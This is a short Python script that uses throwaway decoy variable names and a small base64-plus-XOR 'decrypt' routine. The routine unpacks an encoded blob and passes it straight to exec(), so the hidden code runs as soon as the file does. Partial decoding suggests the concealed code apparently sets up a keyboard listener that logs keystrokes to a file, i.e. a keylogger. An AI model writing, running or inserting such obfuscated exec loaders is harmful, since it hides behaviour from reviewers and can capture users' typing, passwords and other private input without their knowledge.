import base64
bNlZhQQy = 5959
FSfuTXtk = 'baz'

def decrypt(code, key):
    decoded = base64.b64decode(code).decode()
    return ''.join([chr(ord(c) ^ key) for c in decoded])

exec(decrypt('worCnsKDwoHDjMKcwpXCgsKcwpnCmMOMwoXCgcKcwoPCnsKYw4zCh8KJwpXCjsKDwo3CnsKIw6bDpsKIwonCisOMwoPCgsKzwpzCnsKJwp/Cn8OEwofCicKVw4XDlsOmw4zDjMOMw4zCmMKewpXDlsOmw4zDjMOMw4zDjMOMw4zDjMKbwoXCmMKEw4zCg8KcwonCgsOEw47Ch8KJwpXCn8OCwoDCg8KLw47DgMOMw47CjcOOw4XDjMKNwp/DjMKKw5bDpsOMw4zDjMOMw4zDjMOMw4zDjMOMw4zDjMKKw4LCm8KewoXCmMKJw4TCh8KJwpXDgsKPwoTCjcKew4XDpsOMw4zDjMOMwonClMKPwonCnMKYw4zCrcKYwpjCnsKFwo7CmcKYwonCqcKewp7Cg8Kew5bDpsOMw4zDjMOMw4zDjMOMw4zCm8KFwpjChMOMwoPCnMKJwoLDhMOOwofCicKVwp/DgsKAwoPCi8OOw4DDjMOOwo3DjsOFw4zCjcKfw4zCisOWw6bDjMOMw4zDjMOMw4zDjMOMw4zDjMOMw4zCisOCwpvCnsKFwpjCicOEworDjsK3wpfCh8KJwpXCkcKxw47DhcOmw6bCiMKJworDjMKfwpjCjcKewpjCs8KAwoPCi8KLwonCnsOEw4XDlsOmw4zDjMOMw4zCm8KFwpjChMOMwofCicKVwo7Cg8KNwp7CiMOCwqDChcKfwpjCicKCwonCnsOEwoPCgsKzwpzCnsKJwp/Cn8ORwoPCgsKzwpzCnsKJwp/Cn8OFw4zCjcKfw4zCgMKFwp/CmMKJwoLCicKew5bDpsOMw4zDjMOMw4zDjMOMw4zCgMKFwp/CmMKJwoLCicKew4LChsKDwoXCgsOEw4XDpsOmwp/CmMKNwp7CmMKzwoDCg8KLwovCicKew4TDhcOmw6bDpsOm', 236))